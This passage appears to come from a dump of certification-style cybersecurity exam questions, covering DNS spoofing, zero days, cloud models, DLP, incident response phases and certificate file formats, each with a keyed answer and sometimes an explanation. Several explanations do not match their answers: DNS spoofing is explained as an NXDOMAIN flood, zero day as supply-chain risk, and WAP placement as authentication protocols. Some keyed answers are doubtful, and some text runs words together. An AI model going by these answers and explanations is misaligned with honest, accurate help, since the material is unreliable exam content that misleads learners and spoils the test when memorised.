Answer: C The Diamond Model of Intrusion Analysis suggests a framework to analyze an intrusion event (E) by exploring the relationships between four core features: adversary, capability, infrastructure, and victim. A security researcher can track an adversary by noting its attacks and techniques based on its capabilities, infrastructure, and victims.

QUESTION 862 The technology department at a large global company is expanding its Wi-Fi network infrastructure at the headquarters building. Which of the following should be closely coordinated between the technology, cybersecurity, and physical security departments? A. Authentication protocol B. Encryption type C. WAP placement D.VPN configuration

Answer: C The authentication protocol would define how the users send their credential to the access point

QUESTION 833 A company's public-facing website, https://www.organization.com, has an IP address of 166.18.75.6. However, over the past hour the SOC has received reports of the site's homepage displaying incorrect information. A quick nslookup search shows https://www.organization.com is pointing to 151.191.122.115. Which of the following is occurring? A. DoS attack B. ARP poisoning C. DNS spoofing D.NXDOMAINattack

Answer: C The roadmap to every single computer on the Internet is held in DNS servers. The DNS NXDOMAIN flood attack attempts to make servers disappear from the Internet by making it impossible for clients to access the roadmap. In this attack, the attacker floods the DNS server with requests for invalid or nonexistent records. The DNS server spends its time searching for something that doesn't exist instead of serving legitimate requests. The result is that the cache on the DNS server gets filled with bad requests, and clients can't find the servers they are looking for.

QUESTION 809 During a recent security assessment, a vulnerability was found in a common OS. The OS vendor was unaware of the issue and promised to release a patch within the next quarter. Which of the following BEST describes this type of vulnerability? A. Legacy operating system B. Weak configuration C. Zero day D. Supply chain

Answer: C Third-Party Risks - High-profile breaches have led to a greater appreciation of the importance of the supply chain in vulnerability management. A product, or even a service, may have components created and maintained by a long chain of different companies. Each company in the chain depends on its suppliers or vendors performing due diligence on their vendors. A weak link in the chain could cause impacts on service availability and performance, or in the worst cases lead to data breaches.

QUESTION 865 A business is looking for a cloud service provider that offers a la carte services, including cloud backups, VM elasticity, and secure networking. Which of the following cloud service provider types should the business engage? A. IaaS B. PaaS C. XaaS D. SaaS

Answer: C "A la carte" service means you can get any service you want from what the provider offers

QUESTION 897 A company recently implemented a patch management policy; however, vulnerability scanners have still been flagging several hosts, even after the completion of the patch process. Which of the following is the MOST likely cause of the issue? A. The vendor firmware lacks support. B. Zero-day vulnerabilities are being discovered. C. Third-party applications are not being patched. D. Code development is being outsourced

Answer: C It's not zero day. It's extremely unlikely a vulnerability scanner would discover a zero day vulnerability that nobody knows exists

QUESTION 883 An employee's company account was used in a data breach. Interviews with the employee revealed: - The employee was able to avoid changing passwords by using a previous password again. - The account was accessed from a hostile, foreign nation, but the employee has never traveled to any other countries. Which of the following can be implemented to prevent these issues from reoccurring? (Choose two.) A. Geographic dispersal B. Password complexity C. Password history D. Geotagging E. Password lockout F. Geofencing

Answer: CF

QUESTION 817 A systems engineer wants to leverage a cloud-based architecture with low latency between network-connected devices that also reduces the bandwidth that is required by performing analytics directly on the endpoints. Which of the following would BEST meet the requirements? (Choose two.) A. Private cloud B. SaaS C. Hybrid cloud D. IaaS E. DRaaS F. Fog computing

Answer: CF Many people use the terms fog computing and edge computing interchangeably because both involve bringing intelligence and processing closer to where the data is created. Fog computing is a distributed form of cloud computing, in which the workload is performed on a distributed, decentralized architecture. Originally developed by Cisco, fog computing moves some of the work into the local space to manage latency issues, with the cloud being less synchronous. In this form, itis similar to edgecomputing

QUESTION 837 Which of the following involves the inclusion of code in the main codebase as soon as it is written? A. Continuous monitoring B. Continuous deployment C. Continuous Validation D.Continuous integration

Answer: D

QUESTION 844 Which of the following incident response steps occurs before containment? A. Eradication B. Recovery C. Lessons learned D.Identification

Answer: D

QUESTION 853 Which of the following BEST describes a technique that compensates researchers for finding vulnerabilities? A. Penetration testing B. Code review C. Wardriving D. Bug bounty

Answer: D

QUESTION 856 A security engineer is reviewing the logs from a SAML application that is configured to use MFA, during this review the engineer notices a high volume of successful logins that did not require MFA from users who were traveling internationally. The application, which can be accessed without a VPN, has a policy that allows time-based tokens to be generated. Users who changed locations should be required to reauthenticate but haven't been. Which of the following statements BEST explains the issue? A. OpenID is mandatory to make the MFA requirements work. B. An incorrect browser has been detected by the SAML application. C. The access device has a trusted certificate installed that is overwriting the session token. D. The user's IP address is changing between logins, but the application is not invalidating the token.

Answer: D

QUESTION 867 Which of the following can reduce vulnerabilities by avoiding code reuse? A. Memory management B. Stored procedures C. Normalization D. Code obfuscation

Answer: D

QUESTION 876 During a Chief Information Security Officer (CISO) convention to discuss security awareness, the attendees are provided with a network connection to use as a resource. As the convention progresses, one of the attendees starts to notice delays in the connection, and the HTTPS site requests are reverting to HTTP. Which of the following BEST describes what is happening? A. Birthday collision on the certificate key B. DNS hijacking to reroute traffic C. Brute force to the access point D. A SSL/TLS downgrade

Answer: D

QUESTION 880 A company is switching to a remote work model for all employees. All company and employee resources will be in the cloud. Employees must use their personal computers to access the cloud computing environment. The company will manage the operating system. Which of the following deployment models is the company implementing? A. CYOD B. MDM C. COPE D. VDI

Answer: D

QUESTION 881 A security administrator needs to inspect in-transit files on the enterprise network to search for PII, credit card data, and classification words. Which of the following would be the BEST to use? A. IDS solution B. EDR solution C. HIPS software solution D. Network DLP solution

Answer: D

QUESTION 857 The help desk has received calls from users in multiple locations who are unable to access core network services The network team has identified the problem and turned off the network switches using remote commands. Which of the following actions should the network team take NEXT? A. Disconnect all external network connections from the firewall B. Send response teams to the network switch locations to perform updates C. Turn on all the network switches by using the centralized management software D. Initiate the organization's incident response plan.

Answer: D In the given scenario, since multiple locations are affected, and the network team has identified and turned off the network switches, it suggests a widespread network issue that could have been caused by an attack or a major network fault. Therefore, the next action the network team should take is to initiate the organization's incident response plan. This plan will help them identify the cause of the problem and respond appropriately to minimize the impact and restore normal operations as quickly as possible.

QUESTION 846 Which of the technologies is used to actively monitor for specific file types being transmitted on the network? A. File integrity monitoring B. Honeynets C. Tcp replay D. Data loss prevention

Answer: D Many Enterprise Protection Platforms (EPPs) include a data loss prevention (DLP) agent. This is configured with policies to identify privileged files and strings that should be kept private or confidential, such as credit card numbers. The agent enforces the policy to prevent data from being copied or attached to a message without authorization.

QUESTION 904 Which of the following secure application development concepts aims to block verbose error messages from being shown in a user's interface? A. OWASP B. Obfuscation/camouflage C. Test environment D. Prevention of information exposure

Answer: D Prevention of information exposure. This concept focuses on ensuring that sensitive information, such as stack traces, debug output, and detailed error messages, are not disclosed to unauthorized parties through the user interface.

QUESTION 830 A store receives reports that shoppers' credit card information is being stolen. Upon further analysis, those same shoppers also withdrew money from an ATM in that store. The attackers are using the targeted shoppers' credit card information to make online purchases. Which of the following attacks is the MOST probable cause? A. Identity theft B. RFID cloning C. Shoulder surfing D.Card skimming

Answer: D Skimming occurs when devices illegally installed on ATMs, point-of-sale (POS) terminals, or fuel pumps capture data or record cardholders' PINs

QUESTION 818 A company acquired several other small companies. The company that acquired the others is transitioning network services to the cloud. The company wants to make sure that performance and security remain intact. Which of the following BEST meets both requirements? A. High availability B. Application security C. Segmentation D. Integration and auditing

Answer: D The integration of the appropriate level and quantity of security controls is a subject that is always being audited. Are the controls appropriate? Are they placed and used correctly? Most importantly, are they effective? Theseare standard ITauditelements in theenterprise. Themoving ofcomputing resources to thecloud does not change the need or intentofaudit functions

QUESTION 824 An organization is tuning SIEM rules based on threat intelligence reports. Which of the following phases of the incident response process does this scenario represent? A. Lessons learned B. Eradication C. Recovery D. Preparation

Answer: D The preparation phase is when the organization is preparing for the attack. Tuning the SIEM is just providing the latest threat information to the system for preparation. Phases of the Incident Response Plan: 1. Preparation - Preparing for an attack and how to respond 2. Identification - Identifying the threat 3. Containment - Containing the threat 4. Eradication - Removing the threat 5. Recovery - Recovering affected systems 6. Lessons Learned - Evaluating the incident response,see wherethere can be improvements for a future incident.

QUESTION 849 A third party asked a user to share a public key for secure communication. Which of the following file formats should the user choose to share the key? A. .pfx B. .csr C. .pvk D. .cer

Answer: D A file with an extension .cer is responsible for storing some information about the owner certificate and the specific public key. This format of files cannot store the private keys and have the capacity to store only one certificate which is x509. PFX (personal information exchange) Windows file format for storing a private key and certificate data. The file can be password-protected. CSR (certificate signing request) A Base64 ASCII file that a subject sends to a CA to get a certificate.

QUESTION 860 Which of the following roles would MOST likely have direct access to the senior management team? A. Data custodian B. Data owner C. Data protection officer D. Data controller

Answer: D Data controller—the entity responsible for determining why and how data is stored, collected, and used and for ensuring that these purposes and means are lawful. The data controller has ultimate responsibility for privacy breaches, and is not permitted to transfer that responsibility.

QUESTION 890 A network administrator needs to determine the sequence of a server farm's logs. Which of the following should the administrator consider? (Choose two.) A. Chain of custody B. Tags C. Reports D. Time stamps E. Hash values F. Time offset

Answer: DF Time stamps and the time offset (think time zones) will definitely impact the order in which they are displayed